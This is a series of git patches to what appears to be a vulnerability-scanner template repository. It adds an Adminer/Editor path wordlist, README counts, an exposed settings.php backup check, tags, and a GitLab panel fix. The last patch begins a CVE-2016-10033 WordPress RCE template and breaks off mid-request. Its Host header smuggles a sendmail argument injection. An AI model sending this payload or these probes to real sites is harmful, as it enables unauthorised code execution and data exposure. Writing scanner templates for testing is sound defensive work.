+/adminer-3.6.2.php +/adminer-3.6.2/ +/adminer-3.6.3-en.php +/adminer-3.6.3-mysql-en.php +/adminer-3.6.3-mysql.php +/adminer-3.6.3.php +/adminer-3.6.3/ +/adminer-3.6.4-en.php +/adminer-3.6.4-mysql-en.php +/adminer-3.6.4-mysql.php +/adminer-3.6.4.php +/adminer-3.6.4/ +/adminer-3.7.0-en.php +/adminer-3.7.0-mysql-en.php +/adminer-3.7.0-mysql.php +/adminer-3.7.0.php +/adminer-3.7.0/ +/adminer-3.7.1-en.php +/adminer-3.7.1-mysql-en.php +/adminer-3.7.1-mysql.php +/adminer-3.7.1.php +/adminer-3.7.1/ +/adminer-4.0.0.php +/adminer-4.0.1-en.php +/adminer-4.0.1-mysql-en.php +/adminer-4.0.1-mysql.php +/adminer-4.0.1.php +/adminer-4.0.1/ +/adminer-4.0.2-en.php +/adminer-4.0.2-mysql-en.php +/adminer-4.0.2-mysql.php +/adminer-4.0.2.php +/adminer-4.0.2/ +/adminer-4.0.3-en.php +/adminer-4.0.3-mysql-en.php +/adminer-4.0.3-mysql.php +/adminer-4.0.3.php +/adminer-4.0.3/ +/adminer-4.1.0-en.php +/adminer-4.1.0-mysql-en.php +/adminer-4.1.0-mysql.php +/adminer-4.1.0.php +/adminer-4.1.0/ +/adminer-4.2.0-en.php +/adminer-4.2.0-mysql-en.php +/adminer-4.2.0-mysql.php +/adminer-4.2.0.php +/adminer-4.2.0/ +/adminer-4.2.1-en.php +/adminer-4.2.1-mysql-en.php +/adminer-4.2.1-mysql.php +/adminer-4.2.1.php +/adminer-4.2.1/ +/adminer-4.2.2-en.php +/adminer-4.2.2-mysql-en.php +/adminer-4.2.2-mysql.php +/adminer-4.2.2.php +/adminer-4.2.2/ +/adminer-4.2.3-en.php +/adminer-4.2.3-mysql-en.php +/adminer-4.2.3-mysql.php +/adminer-4.2.3.php +/adminer-4.2.3/ +/adminer-4.2.4-en.php +/adminer-4.2.4-mysql-en.php +/adminer-4.2.4-mysql.php +/adminer-4.2.4.php +/adminer-4.2.4/ +/adminer-4.2.5-cs.php +/adminer-4.2.5-de.php +/adminer-4.2.5-en.php +/adminer-4.2.5-mysql-cs.php +/adminer-4.2.5-mysql-de.php +/adminer-4.2.5-mysql-en.php +/adminer-4.2.5-mysql-pl.php +/adminer-4.2.5-mysql-sk.php +/adminer-4.2.5-mysql.php +/adminer-4.2.5-pl.php +/adminer-4.2.5-sk.php +/adminer-4.2.5.php +/adminer-4.2.5/ +/adminer-4.3.0-cs.php +/adminer-4.3.0-de.php +/adminer-4.3.0-en.php +/adminer-4.3.0-mysql-cs.php +/adminer-4.3.0-mysql-de.php +/adminer-4.3.0-mysql-en.php +/adminer-4.3.0-mysql-pl.php +/adminer-4.3.0-mysql-sk.php +/adminer-4.3.0-mysql.php +/adminer-4.3.0-pl.php +/adminer-4.3.0-sk.php +/adminer-4.3.0.php +/adminer-4.3.0/ +/adminer-4.3.1-cs.php +/adminer-4.3.1-de.php +/adminer-4.3.1-en.php +/adminer-4.3.1-mysql-cs.php +/adminer-4.3.1-mysql-de.php +/adminer-4.3.1-mysql-en.php +/adminer-4.3.1-mysql-pl.php +/adminer-4.3.1-mysql-sk.php +/adminer-4.3.1-mysql.php +/adminer-4.3.1-pl.php +/adminer-4.3.1-sk.php +/adminer-4.3.1.php +/adminer-4.3.1/ +/adminer-4.4.0-cs.php +/adminer-4.4.0-de.php +/adminer-4.4.0-en.php +/adminer-4.4.0-mysql-cs.php +/adminer-4.4.0-mysql-de.php +/adminer-4.4.0-mysql-en.php +/adminer-4.4.0-mysql-pl.php +/adminer-4.4.0-mysql-sk.php +/adminer-4.4.0-mysql.php +/adminer-4.4.0-pl.php +/adminer-4.4.0-sk.php +/adminer-4.4.0.php +/adminer-4.4.0/ +/adminer-4.5.0-cs.php +/adminer-4.5.0-de.php +/adminer-4.5.0-en.php +/adminer-4.5.0-mysql-cs.php +/adminer-4.5.0-mysql-de.php +/adminer-4.5.0-mysql-en.php +/adminer-4.5.0-mysql-pl.php +/adminer-4.5.0-mysql-sk.php +/adminer-4.5.0-mysql.php +/adminer-4.5.0-pl.php +/adminer-4.5.0-sk.php +/adminer-4.5.0.php +/adminer-4.5.0/ +/adminer-4.6.0-cs.php +/adminer-4.6.0-de.php +/adminer-4.6.0-en.php +/adminer-4.6.0-mysql-cs.php +/adminer-4.6.0-mysql-de.php +/adminer-4.6.0-mysql-en.php +/adminer-4.6.0-mysql-pl.php +/adminer-4.6.0-mysql-sk.php +/adminer-4.6.0-mysql.php +/adminer-4.6.0-pl.php +/adminer-4.6.0-sk.php +/adminer-4.6.0.php +/adminer-4.6.0/ +/adminer-4.6.1-cs.php +/adminer-4.6.1-de.php +/adminer-4.6.1-en.php +/adminer-4.6.1-mysql-cs.php +/adminer-4.6.1-mysql-de.php +/adminer-4.6.1-mysql-en.php +/adminer-4.6.1-mysql-pl.php +/adminer-4.6.1-mysql-sk.php +/adminer-4.6.1-mysql.php +/adminer-4.6.1-pl.php +/adminer-4.6.1-sk.php +/adminer-4.6.1.php +/adminer-4.6.1/ +/adminer-4.6.2-cs.php +/adminer-4.6.2-de.php +/adminer-4.6.2-en.php +/adminer-4.6.2-mysql-cs.php +/adminer-4.6.2-mysql-de.php +/adminer-4.6.2-mysql-en.php +/adminer-4.6.2-mysql-pl.php +/adminer-4.6.2-mysql-sk.php +/adminer-4.6.2-mysql.php +/adminer-4.6.2-pl.php +/adminer-4.6.2-sk.php +/adminer-4.6.2.php +/adminer-4.6.2/ +/adminer-4.6.3-cs.php +/adminer-4.6.3-de.php +/adminer-4.6.3-en.php +/adminer-4.6.3-mysql-cs.php +/adminer-4.6.3-mysql-de.php +/adminer-4.6.3-mysql-en.php +/adminer-4.6.3-mysql-pl.php +/adminer-4.6.3-mysql-sk.php +/adminer-4.6.3-mysql.php +/adminer-4.6.3-pl.php +/adminer-4.6.3-sk.php +/adminer-4.6.3.php +/adminer-4.6.3/ +/adminer-4.7.0-cs.php +/adminer-4.7.0-de.php +/adminer-4.7.0-en.php +/adminer-4.7.0-mysql-cs.php +/adminer-4.7.0-mysql-de.php +/adminer-4.7.0-mysql-en.php +/adminer-4.7.0-mysql-pl.php +/adminer-4.7.0-mysql-sk.php +/adminer-4.7.0-mysql.php +/adminer-4.7.0-pl.php +/adminer-4.7.0-sk.php +/adminer-4.7.0.php +/adminer-4.7.0/ +/adminer-4.7.1-cs.php +/adminer-4.7.1-de.php +/adminer-4.7.1-en.php +/adminer-4.7.1-mysql-cs.php +/adminer-4.7.1-mysql-de.php +/adminer-4.7.1-mysql-en.php +/adminer-4.7.1-mysql-pl.php +/adminer-4.7.1-mysql-sk.php +/adminer-4.7.1-mysql.php +/adminer-4.7.1-pl.php +/adminer-4.7.1-sk.php +/adminer-4.7.1.php +/adminer-4.7.1/ +/adminer-4.7.2-cs.php +/adminer-4.7.2-de.php +/adminer-4.7.2-en.php +/adminer-4.7.2-mysql-cs.php +/adminer-4.7.2-mysql-de.php +/adminer-4.7.2-mysql-en.php +/adminer-4.7.2-mysql-pl.php +/adminer-4.7.2-mysql-sk.php +/adminer-4.7.2-mysql.php +/adminer-4.7.2-pl.php +/adminer-4.7.2-sk.php +/adminer-4.7.2.php +/adminer-4.7.2/ +/adminer-4.7.3-cs.php +/adminer-4.7.3-de.php +/adminer-4.7.3-en.php +/adminer-4.7.3-mysql-cs.php +/adminer-4.7.3-mysql-de.php +/adminer-4.7.3-mysql-en.php +/adminer-4.7.3-mysql-pl.php +/adminer-4.7.3-mysql-sk.php +/adminer-4.7.3-mysql.php +/adminer-4.7.3-pl.php +/adminer-4.7.3-sk.php +/adminer-4.7.3.php +/adminer-4.7.3/ +/adminer-4.7.4-cs.php +/adminer-4.7.4-de.php +/adminer-4.7.4-en.php +/adminer-4.7.4-mysql-cs.php +/adminer-4.7.4-mysql-de.php +/adminer-4.7.4-mysql-en.php +/adminer-4.7.4-mysql-pl.php +/adminer-4.7.4-mysql-sk.php +/adminer-4.7.4-mysql.php +/adminer-4.7.4-pl.php +/adminer-4.7.4-sk.php +/adminer-4.7.4.php +/adminer-4.7.4/ +/adminer-4.7.5-cs.php +/adminer-4.7.5-de.php +/adminer-4.7.5-en.php +/adminer-4.7.5-mysql-cs.php +/adminer-4.7.5-mysql-de.php +/adminer-4.7.5-mysql-en.php +/adminer-4.7.5-mysql-pl.php +/adminer-4.7.5-mysql-sk.php +/adminer-4.7.5-mysql.php +/adminer-4.7.5-pl.php +/adminer-4.7.5-sk.php +/adminer-4.7.5.php +/adminer-4.7.5/ +/adminer-4.7.6-cs.php +/adminer-4.7.6-de.php +/adminer-4.7.6-en.php +/adminer-4.7.6-mysql-cs.php +/adminer-4.7.6-mysql-de.php +/adminer-4.7.6-mysql-en.php +/adminer-4.7.6-mysql-pl.php +/adminer-4.7.6-mysql-sk.php +/adminer-4.7.6-mysql.php +/adminer-4.7.6-pl.php +/adminer-4.7.6-sk.php +/adminer-4.7.6.php +/adminer-4.7.6/ +/adminer-4.7.7-cs.php +/adminer-4.7.7-de.php +/adminer-4.7.7-en.php +/adminer-4.7.7-mysql-cs.php +/adminer-4.7.7-mysql-de.php +/adminer-4.7.7-mysql-en.php +/adminer-4.7.7-mysql-pl.php +/adminer-4.7.7-mysql-sk.php +/adminer-4.7.7-mysql.php +/adminer-4.7.7-pl.php +/adminer-4.7.7-sk.php +/adminer-4.7.7.php +/adminer-4.7.7/ +/adminer-4.7.8-cs.php +/adminer-4.7.8-de.php +/adminer-4.7.8-en.php +/adminer-4.7.8-mysql-cs.php +/adminer-4.7.8-mysql-de.php +/adminer-4.7.8-mysql-en.php +/adminer-4.7.8-mysql-pl.php +/adminer-4.7.8-mysql-sk.php +/adminer-4.7.8-mysql.php +/adminer-4.7.8-pl.php +/adminer-4.7.8-sk.php +/adminer-4.7.8.php +/adminer-4.7.8/ +/adminer-4.7.9-cs.php +/adminer-4.7.9-de.php +/adminer-4.7.9-en.php +/adminer-4.7.9-mysql-cs.php +/adminer-4.7.9-mysql-de.php +/adminer-4.7.9-mysql-en.php +/adminer-4.7.9-mysql-pl.php +/adminer-4.7.9-mysql-sk.php +/adminer-4.7.9-mysql.php +/adminer-4.7.9-pl.php +/adminer-4.7.9-sk.php +/adminer-4.7.9.php +/adminer-4.7.9/ +/adminer-4.8.0-cs.php +/adminer-4.8.0-de.php +/adminer-4.8.0-en.php +/adminer-4.8.0-mysql-cs.php +/adminer-4.8.0-mysql-de.php +/adminer-4.8.0-mysql-en.php +/adminer-4.8.0-mysql-pl.php +/adminer-4.8.0-mysql-sk.php +/adminer-4.8.0-mysql.php +/adminer-4.8.0-pl.php +/adminer-4.8.0-sk.php +/adminer-4.8.0.php +/adminer-4.8.0/ +/adminer-mysql.php +/adminer.php +/adminer/ +/adminer/adminer.php +/adminer1.php +/data/adminer.php +/editor-3.0.1-mysql-en.php +/editor-3.0.1-mysql.php +/editor-3.0.1.php +/editor-3.1.0-mysql-en.php +/editor-3.1.0-mysql.php +/editor-3.1.0.php +/editor-3.2.0-mysql-en.php +/editor-3.2.0-mysql.php +/editor-3.2.0.php +/editor-3.2.2-mysql-en.php +/editor-3.2.2-mysql.php +/editor-3.2.2.php +/editor-3.3.0-mysql-en.php +/editor-3.3.0-mysql.php +/editor-3.3.0.php +/editor-3.3.1-mysql-en.php +/editor-3.3.1-mysql.php +/editor-3.3.1.php +/editor-3.3.3-mysql-en.php +/editor-3.3.3-mysql.php +/editor-3.3.3.php +/editor-3.3.4-mysql-en.php +/editor-3.3.4-mysql.php +/editor-3.3.4.php +/editor-3.4.0-mysql-en.php +/editor-3.4.0-mysql.php +/editor-3.4.0.php +/editor-3.5.1-mysql-en.php +/editor-3.5.1-mysql.php +/editor-3.5.1.php +/editor-3.6.1-mysql-en.php +/editor-3.6.1-mysql.php +/editor-3.6.1.php +/editor-3.6.2-mysql-en.php +/editor-3.6.2-mysql.php +/editor-3.6.2.php +/editor-3.6.3-mysql-en.php +/editor-3.6.3-mysql.php +/editor-3.6.3.php +/editor-3.6.4-mysql-en.php +/editor-3.6.4-mysql.php +/editor-3.6.4.php +/editor-3.7.0-mysql-en.php +/editor-3.7.0-mysql.php +/editor-3.7.0.php +/editor-3.7.1-mysql-en.php +/editor-3.7.1-mysql.php +/editor-3.7.1.php +/editor-4.0.1-en.php +/editor-4.0.1-mysql-en.php +/editor-4.0.1-mysql.php +/editor-4.0.1.php +/editor-4.0.2-en.php +/editor-4.0.2-mysql-en.php +/editor-4.0.2-mysql.php +/editor-4.0.2.php +/editor-4.0.3-en.php +/editor-4.0.3-mysql-en.php +/editor-4.0.3-mysql.php +/editor-4.0.3.php +/editor-4.1.0-en.php +/editor-4.1.0-mysql-en.php +/editor-4.1.0-mysql.php +/editor-4.1.0.php +/editor-4.2.0-en.php +/editor-4.2.0-mysql-en.php +/editor-4.2.0-mysql.php +/editor-4.2.0.php +/editor-4.2.1-en.php +/editor-4.2.1-mysql-en.php +/editor-4.2.1-mysql.php +/editor-4.2.1.php +/editor-4.2.2-en.php +/editor-4.2.2-mysql-en.php +/editor-4.2.2-mysql.php +/editor-4.2.2.php +/editor-4.2.3-en.php +/editor-4.2.3-mysql-en.php +/editor-4.2.3-mysql.php +/editor-4.2.3.php +/editor-4.2.4-en.php +/editor-4.2.4-mysql-en.php +/editor-4.2.4-mysql.php +/editor-4.2.4.php +/editor-4.2.5-cs.php +/editor-4.2.5-de.php +/editor-4.2.5-en.php +/editor-4.2.5-mysql-cs.php +/editor-4.2.5-mysql-de.php +/editor-4.2.5-mysql-en.php +/editor-4.2.5-mysql-pl.php +/editor-4.2.5-mysql-sk.php +/editor-4.2.5-mysql.php +/editor-4.2.5-pl.php +/editor-4.2.5-sk.php +/editor-4.2.5.php +/editor-4.3.0-cs.php +/editor-4.3.0-de.php +/editor-4.3.0-en.php +/editor-4.3.0-mysql-cs.php +/editor-4.3.0-mysql-de.php +/editor-4.3.0-mysql-en.php +/editor-4.3.0-mysql-pl.php +/editor-4.3.0-mysql-sk.php +/editor-4.3.0-mysql.php +/editor-4.3.0-pl.php +/editor-4.3.0-sk.php +/editor-4.3.0.php +/editor-4.3.1-cs.php +/editor-4.3.1-de.php +/editor-4.3.1-en.php +/editor-4.3.1-mysql-cs.php +/editor-4.3.1-mysql-de.php +/editor-4.3.1-mysql-en.php +/editor-4.3.1-mysql-pl.php +/editor-4.3.1-mysql-sk.php +/editor-4.3.1-mysql.php +/editor-4.3.1-pl.php +/editor-4.3.1-sk.php +/editor-4.3.1.php +/editor-4.4.0-cs.php +/editor-4.4.0-de.php +/editor-4.4.0-en.php +/editor-4.4.0-mysql-cs.php +/editor-4.4.0-mysql-de.php +/editor-4.4.0-mysql-en.php +/editor-4.4.0-mysql-pl.php +/editor-4.4.0-mysql-sk.php +/editor-4.4.0-mysql.php +/editor-4.4.0-pl.php +/editor-4.4.0-sk.php +/editor-4.4.0.php +/editor-4.5.0-cs.php +/editor-4.5.0-de.php +/editor-4.5.0-en.php +/editor-4.5.0-mysql-cs.php +/editor-4.5.0-mysql-de.php +/editor-4.5.0-mysql-en.php +/editor-4.5.0-mysql-pl.php +/editor-4.5.0-mysql-sk.php +/editor-4.5.0-mysql.php +/editor-4.5.0-pl.php +/editor-4.5.0-sk.php +/editor-4.5.0.php +/editor-4.6.0-cs.php +/editor-4.6.0-de.php +/editor-4.6.0-en.php +/editor-4.6.0-mysql-cs.php +/editor-4.6.0-mysql-de.php +/editor-4.6.0-mysql-en.php +/editor-4.6.0-mysql-pl.php +/editor-4.6.0-mysql-sk.php +/editor-4.6.0-mysql.php +/editor-4.6.0-pl.php +/editor-4.6.0-sk.php +/editor-4.6.0.php +/editor-4.6.1-cs.php +/editor-4.6.1-de.php +/editor-4.6.1-en.php +/editor-4.6.1-mysql-cs.php +/editor-4.6.1-mysql-de.php +/editor-4.6.1-mysql-en.php +/editor-4.6.1-mysql-pl.php +/editor-4.6.1-mysql-sk.php +/editor-4.6.1-mysql.php +/editor-4.6.1-pl.php +/editor-4.6.1-sk.php +/editor-4.6.1.php +/editor-4.6.2-cs.php +/editor-4.6.2-de.php +/editor-4.6.2-en.php +/editor-4.6.2-mysql-cs.php +/editor-4.6.2-mysql-de.php +/editor-4.6.2-mysql-en.php +/editor-4.6.2-mysql-pl.php +/editor-4.6.2-mysql-sk.php +/editor-4.6.2-mysql.php +/editor-4.6.2-pl.php +/editor-4.6.2-sk.php +/editor-4.6.2.php +/editor-4.6.3-cs.php +/editor-4.6.3-de.php +/editor-4.6.3-en.php +/editor-4.6.3-mysql-cs.php +/editor-4.6.3-mysql-de.php +/editor-4.6.3-mysql-en.php +/editor-4.6.3-mysql-pl.php +/editor-4.6.3-mysql-sk.php +/editor-4.6.3-mysql.php +/editor-4.6.3-pl.php +/editor-4.6.3-sk.php +/editor-4.6.3.php +/editor-4.7.0-cs.php +/editor-4.7.0-de.php +/editor-4.7.0-en.php +/editor-4.7.0-mysql-cs.php +/editor-4.7.0-mysql-de.php +/editor-4.7.0-mysql-en.php +/editor-4.7.0-mysql-pl.php +/editor-4.7.0-mysql-sk.php +/editor-4.7.0-mysql.php +/editor-4.7.0-pl.php +/editor-4.7.0-sk.php +/editor-4.7.0.php +/editor-4.7.1-cs.php +/editor-4.7.1-de.php +/editor-4.7.1-en.php +/editor-4.7.1-mysql-cs.php +/editor-4.7.1-mysql-de.php +/editor-4.7.1-mysql-en.php +/editor-4.7.1-mysql-pl.php +/editor-4.7.1-mysql-sk.php +/editor-4.7.1-mysql.php +/editor-4.7.1-pl.php +/editor-4.7.1-sk.php +/editor-4.7.1.php +/editor-4.7.2-cs.php +/editor-4.7.2-de.php +/editor-4.7.2-en.php +/editor-4.7.2-mysql-cs.php +/editor-4.7.2-mysql-de.php +/editor-4.7.2-mysql-en.php +/editor-4.7.2-mysql-pl.php +/editor-4.7.2-mysql-sk.php +/editor-4.7.2-mysql.php +/editor-4.7.2-pl.php +/editor-4.7.2-sk.php +/editor-4.7.2.php +/editor-4.7.3-cs.php +/editor-4.7.3-de.php +/editor-4.7.3-en.php +/editor-4.7.3-mysql-cs.php +/editor-4.7.3-mysql-de.php +/editor-4.7.3-mysql-en.php +/editor-4.7.3-mysql-pl.php +/editor-4.7.3-mysql-sk.php +/editor-4.7.3-mysql.php +/editor-4.7.3-pl.php +/editor-4.7.3-sk.php +/editor-4.7.3.php +/editor-4.7.4-cs.php +/editor-4.7.4-de.php +/editor-4.7.4-en.php +/editor-4.7.4-mysql-cs.php +/editor-4.7.4-mysql-de.php +/editor-4.7.4-mysql-en.php +/editor-4.7.4-mysql-pl.php +/editor-4.7.4-mysql-sk.php +/editor-4.7.4-mysql.php +/editor-4.7.4-pl.php +/editor-4.7.4-sk.php +/editor-4.7.4.php +/editor-4.7.5-cs.php +/editor-4.7.5-de.php +/editor-4.7.5-en.php +/editor-4.7.5-mysql-cs.php +/editor-4.7.5-mysql-de.php +/editor-4.7.5-mysql-en.php +/editor-4.7.5-mysql-pl.php +/editor-4.7.5-mysql-sk.php +/editor-4.7.5-mysql.php +/editor-4.7.5-pl.php +/editor-4.7.5-sk.php +/editor-4.7.5.php +/editor-4.7.6-cs.php +/editor-4.7.6-de.php +/editor-4.7.6-en.php +/editor-4.7.6-mysql-cs.php +/editor-4.7.6-mysql-de.php +/editor-4.7.6-mysql-en.php +/editor-4.7.6-mysql-pl.php +/editor-4.7.6-mysql-sk.php +/editor-4.7.6-mysql.php +/editor-4.7.6-pl.php +/editor-4.7.6-sk.php +/editor-4.7.6.php +/editor-4.7.7-cs.php +/editor-4.7.7-de.php +/editor-4.7.7-en.php +/editor-4.7.7-mysql-cs.php +/editor-4.7.7-mysql-de.php +/editor-4.7.7-mysql-en.php +/editor-4.7.7-mysql-pl.php +/editor-4.7.7-mysql-sk.php +/editor-4.7.7-mysql.php +/editor-4.7.7-pl.php +/editor-4.7.7-sk.php +/editor-4.7.7.php +/editor-4.7.8-cs.php +/editor-4.7.8-de.php +/editor-4.7.8-en.php +/editor-4.7.8-mysql-cs.php +/editor-4.7.8-mysql-de.php +/editor-4.7.8-mysql-en.php +/editor-4.7.8-mysql-pl.php +/editor-4.7.8-mysql-sk.php +/editor-4.7.8-mysql.php +/editor-4.7.8-pl.php +/editor-4.7.8-sk.php +/editor-4.7.8.php +/editor-4.7.9-cs.php +/editor-4.7.9-de.php +/editor-4.7.9-en.php +/editor-4.7.9-mysql-cs.php +/editor-4.7.9-mysql-de.php +/editor-4.7.9-mysql-en.php +/editor-4.7.9-mysql-pl.php +/editor-4.7.9-mysql-sk.php +/editor-4.7.9-mysql.php +/editor-4.7.9-pl.php +/editor-4.7.9-sk.php +/editor-4.7.9.php +/editor-4.8.0-cs.php +/editor-4.8.0-de.php +/editor-4.8.0-en.php +/editor-4.8.0-mysql-cs.php +/editor-4.8.0-mysql-de.php +/editor-4.8.0-mysql-en.php +/editor-4.8.0-mysql-pl.php +/editor-4.8.0-mysql-sk.php +/editor-4.8.0-mysql.php +/editor-4.8.0-pl.php +/editor-4.8.0-sk.php +/editor-4.8.0.php +/editor-mysql.php +/editor.php +/editor/ +/mysql.php +/php/adminer.php +/phpmyadmin.php +/public/adminer.php +/sql.php +/tools/adminer.php +/web/adminer.php +/wp-content/plugins/adminer/adminer.php \ No newline at end of file From c141c32cab4b3d8e45fa0bfe8401eaff11e3404f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 08:49:08 +0000 Subject: [PATCH 25/64] Auto Update README [Wed Mar 24 08:49:08 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index efb74a15e2..7db1e7ef47 100644 --- a/README.md +++ b/README.md @@ -41,9 +41,9 @@ An overview of the nuclei template directory including number of templates assoc | takeovers | 65 | exposures | 63 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | -| fuzzing | 5 | helpers | 3 | iot | 7 | +| fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 828 files**. +**79 directories, 830 files**. From 70e356a8040522c62bd110c3e71cffe5569a7ed1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 15:21:46 +0530 Subject: [PATCH 26/64] Added settings-php-files --- exposures/backups/settings-php-files.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposures/backups/settings-php-files.yaml diff --git a/exposures/backups/settings-php-files.yaml b/exposures/backups/settings-php-files.yaml new file mode 100644 index 0000000000..9c5be63cd5 --- /dev/null +++ b/exposures/backups/settings-php-files.yaml @@ -0,0 +1,29 @@ +id: settings-php-files + +info: + name: settings.php information disclosure + author: sheikhrishad + severity: medium + tags: backup + +requests: + - method: GET + path: + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/settings.php.dist" + - "{{BaseURL}}/settings.php.old" + - "{{BaseURL}}/settings.php.save" + - "{{BaseURL}}/settings.php.swp" + - "{{BaseURL}}/settings.php.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From 5e27fa8239e8d1f7d1926ca0b5dccae4b6827a73 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 15:21:58 +0530 Subject: [PATCH 27/64] Added more tags --- exposures/apis/openapi.yaml | 1 + exposures/apis/swagger-api.yaml | 5 +++-- exposures/apis/wadl-api.yaml | 1 + exposures/apis/wsdl-api.yaml | 1 + exposures/backups/sql-dump.yaml | 1 + exposures/backups/zip-backup-files.yaml | 1 + 6 files changed, 8 insertions(+), 2 deletions(-) diff --git a/exposures/apis/openapi.yaml b/exposures/apis/openapi.yaml index dc6f1590c7..8d7995c92a 100644 --- a/exposures/apis/openapi.yaml +++ b/exposures/apis/openapi.yaml @@ -4,6 +4,7 @@ info: name: OpenAPI author: pdteam severity: info + tags: api requests: - method: GET diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index 19332c6a4e..29be15e816 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -1,9 +1,10 @@ id: swagger-api info: - name: Swagger API - author: pd-team + name: Public Swagger API + author: pdteam severity: info + tags: api,swagger requests: - method: GET diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index adf4433d25..94c70ca79a 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -4,6 +4,7 @@ info: name: wadl file disclosure author: 0xrudra & manuelbua severity: info + tags: api # References: # - https://github.com/dwisiswant0/wadl-dumper diff --git a/exposures/apis/wsdl-api.yaml b/exposures/apis/wsdl-api.yaml index 44d7f7b49a..df3a326bcb 100644 --- a/exposures/apis/wsdl-api.yaml +++ b/exposures/apis/wsdl-api.yaml @@ -4,6 +4,7 @@ info: name: wsdl-detect author: jarijaas severity: info + tags: api # This detects web services that have WSDL (https://www.w3.org/TR/wsdl/) # For instance, SOAP services, such as: https://docs.microsoft.com/en-us/xamarin/xamarin-forms/data-cloud/web-services/asmx diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index 424ea48ab7..1768459cae 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -4,6 +4,7 @@ info: name: MySQL Dump Files author: geeknik & @dwisiswant0 severity: medium + tags: backup requests: - method: GET diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 5faaea01e7..23d1d46fc0 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -4,6 +4,7 @@ info: name: Compressed Web File author: Toufik Airane & @dwisiswant0 severity: medium + tags: backup requests: - method: GET From c99a50923fd33ade675ef35c96911d683b8e21f1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Mar 2021 09:54:35 +0000 Subject: [PATCH 28/64] Auto Update README [Wed Mar 24 09:54:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7db1e7ef47..3439e8725b 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 253 | vulnerabilities | 116 | exposed-panels | 108 | -| takeovers | 65 | exposures | 63 | technologies | 51 | +| takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | | fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 830 files**. +**79 directories, 831 files**. From f9d98c12129c1ca664b30ffc21d108b6c415642b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 15:47:13 +0530 Subject: [PATCH 29/64] Fixing gitlab-detect --- exposed-panels/{crxde.yaml => crxde-lite.yaml} | 2 +- exposed-panels/gitlab-detect.yaml | 12 +++++++----- 2 files changed, 8 insertions(+), 6 deletions(-) rename exposed-panels/{crxde.yaml => crxde-lite.yaml} (93%) diff --git a/exposed-panels/crxde.yaml b/exposed-panels/crxde-lite.yaml similarity index 93% rename from exposed-panels/crxde.yaml rename to exposed-panels/crxde-lite.yaml index 81e66661bc..36bd50be83 100644 --- a/exposed-panels/crxde.yaml +++ b/exposed-panels/crxde-lite.yaml @@ -1,4 +1,4 @@ -id: crxde +id: crxde-lite info: name: CRXDE Lite diff --git a/exposed-panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml index 5900c52769..e91e5c1eeb 100644 --- a/exposed-panels/gitlab-detect.yaml +++ b/exposed-panels/gitlab-detect.yaml @@ -9,14 +9,16 @@ requests: - method: GET path: - "{{BaseURL}}/users/sign_in" - - "{{BaseURL}}/users/sign_up" - - "{{BaseURL}}/explore" redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word words: - - "GitLab" - - "Register for GitLab" - - "Explore GitLab" + - 'GitLab' + - 'https://about.gitlab.com' + + - type: status + status: + - 200 \ No newline at end of file From 362858a6c9175b81e86f7c78ff7de321d97683e5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 17:03:21 +0530 Subject: [PATCH 30/64] Added CVE-2016-10033 --- cves/2016/CVE-2016-10033.yaml | 50 +++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2016/CVE-2016-10033.yaml diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml new file mode 100644 index 0000000000..cdae3cc13f --- /dev/null +++ b/cves/2016/CVE-2016-10033.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10033 +info: + name: Wordpress 4.6 Remote Code Execution + author: princechaddha + severity: high + reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + Connection: close + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be 